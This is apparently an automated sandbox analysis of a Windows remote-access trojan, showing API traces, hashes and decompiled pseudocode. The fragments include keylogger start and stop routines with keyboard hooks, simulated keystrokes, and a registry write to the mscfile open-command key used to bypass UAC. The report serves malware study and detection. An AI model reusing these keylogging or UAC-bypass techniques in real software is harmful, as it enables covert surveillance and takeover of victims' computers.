                                        • PlaySoundW.WINMM(?,00000000), ref: 00411B41
                                        • Sleep.KERNEL32(00002710), ref: 00411B48
                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00411B54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@PlaySoundV10@$?c_str@?$basic_string@HandleLocalModuleSleepTimeV10@0@V10@@printf
                                        • String ID: Alarm has been triggered!$[ALARM]
                                        • API String ID: 4004766653-1190268461
                                        • Opcode ID: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction ID: 5adc9307e5d744e325bca41e58bf78e276225457fadb31193265d37fe82570ce
                                        • Opcode Fuzzy Hash: 2e7e8d197215856fdaf9e2bc7310ab4df68db1472c87e26e2a014bf043a2bc13
                                        • Instruction Fuzzy Hash: 09F08971744218BFEA0077A5DC4BFED3E2DEB44741F400025FD01D61D4EAE069408AEA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0040D8FF() {
                                        				void* _t10;
                                        				char* _t12;
                                        				int _t13;
                                        				char* _t15;
                                        				signed int _t16;
                                        				char* _t18;
                                        				void* _t41;
                                        				void* _t46;
                                        				intOrPtr _t51;
                                        
                                        				_t51 =  *0x41bf20; // 0x0
                                        				 *0x41c119 = 0;
                                        				if(_t51 != 0) {
                                        					E004020F4(_t10, 0x41bf20);
                                        				}
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t46 - 0x10, _t51, 0));
                                        				_t12 = E0040180C(_t46 - 0x10, _t51, 3);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t13 = atoi(_t12);
                                        				E0040F572();
                                        				_t15 = E0040180C(_t46 - 0x10, _t51, 2);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t16 = atoi(_t15);
                                        				_t18 = E0040180C(_t46 - 0x10, _t16, 1);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E0040F5F4(_t41, _t52, atoi(_t18), _t16 & 0xffffff00 | _t16 != 0x00000000, _t13);
                                        				E004017DD(_t46 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        Instruction addresses: 0x0040d901 0x0040d907 0x0040d90d 0x0040d914 0x0040d914 0x0040d928 0x0040d933 0x0040d93a 0x0040d947 0x0040d94c 0x0040d957 0x0040d95e 0x0040d965 0x0040d973 0x0040d97a 0x0040d985 0x0040e6a4 0x0040e6ac 0x0040e6b5 0x0040e6c1

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D928
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003), ref: 0040D93A
                                        • atoi.MSVCRT ref: 0040D947
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D95E
                                        • atoi.MSVCRT ref: 0040D965
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D97A
                                        • atoi.MSVCRT ref: 0040D981
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@$??4?$basic_string@V01@V01@@closesocket
                                        • String ID:
                                        • API String ID: 2234106156-0
                                        • Opcode ID: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction ID: b6bede96aa3c2da0a069e28b117ba5bdb23d63fcfc1ec7a11f567b0dfa856408
                                        • Opcode Fuzzy Hash: 01ce1ee5bcc4171d1ab48e1a40778728093d77192bc5297049ba7dc6195948f0
                                        • Instruction Fuzzy Hash: 8C111C72A00218DBCB04BBF1EC599EE7769EB94355B00883EE512E71E1EF784909CB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000), ref: 00403224
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040322D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,000003E8,00000000), ref: 0040324D
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00403278
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00403297
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@D@1@@$CloseValue$?length@?$basic_string@?size@?$basic_string@CreateOpenQuery
                                        • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                        • API String ID: 1883807236-2313358711
                                        • Opcode ID: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                        • Instruction ID: 820ff65b2e21daf85941f98613c9b2fccc28e61cad3948ad9cf2f03c1057e28e
                                        • Opcode Fuzzy Hash: ae895c2781c4a898e140f451f196115381b04db4d99b7ace2a8ac6b7857622d6
                                        • Instruction Fuzzy Hash: E1110A72A40554B7DB0267A9DC55BEF7B6DCB85300F0040B6F905A72C1DA780B0647EE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 3885969548-3088914985
                                        • Opcode ID: fc6f0dbaa82ba8b3878df1807979d4d45e0096af3cddfd5eb8410943aec338c7
                                        • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                        • Opcode Fuzzy Hash: fc6f0dbaa82ba8b3878df1807979d4d45e0096af3cddfd5eb8410943aec338c7
                                        • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 19%
                                        			E00405CCA(struct HHOOK__** __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t9;
                                        				struct HHOOK__* _t16;
                                        				struct HHOOK__** _t30;
                                        
                                        				_push(__ecx);
                                        				_t30 = __ecx;
                                        				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                        					_t9 = 0;
                                        				} else {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                        					E00405DD3(__ecx);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                        					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                        					_t30[0xf] = 0;
                                        					_t6 =  &(_t30[0xd]); // 0x0
                                        					_t30[0xa] = 0;
                                        					CloseHandle( *_t6);
                                        					if(_t30[0xf] == 0) {
                                        						_t16 =  *_t30;
                                        						if(_t16 != 0) {
                                        							UnhookWindowsHookEx(_t16); // tear down the keyboard hook held at *this; paired with the "[INFO] Online Keylogger Stopped" log line above
                                        							 *_t30 = 0;
                                        						}
                                        					}
                                        					_t9 = 1;
                                        				}
                                        				return _t9;
                                        			}


                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                        • String ID: Online Keylogger Stopped$[INFO]
                                        • API String ID: 2254939683-2146459034
                                        • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                        • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                        • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                        • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: InputSend
                                        • String ID:
                                        • API String ID: 3431551938-0
                                        • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                        • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                        • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                        				char _v20;
                                        				char _v36;
                                        				void* _t18;
                                        				void* _t20;
                                        				intOrPtr _t39;
                                        
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t39 =  *__eax;
                                        				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                        				_t18 = _t39 - 0x9b; // dispatch on the value read from *__eax; 0x9b is the case handled below
                                        				if(_t18 == 0) {
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                        					 *0x41b288 = 1;
                                        					_t20 = E0040180C( &_v20, __eflags, 0);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E004020C2(0x41b240, 0x9c, _t20);
                                        				} else {
                                        					if(_t18 == 0) { // decompiler artifact: unreachable as written, the same test just failed above
                                        						E00401B26();
                                        					}
                                        				}
                                        				E004017DD( &_v20);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}


                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00401A80
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                          • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                          • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
